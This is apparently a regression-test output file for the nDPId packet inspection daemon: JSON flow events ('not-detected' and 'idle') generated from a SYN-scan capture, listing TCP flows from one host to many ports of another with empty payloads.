+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25734,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 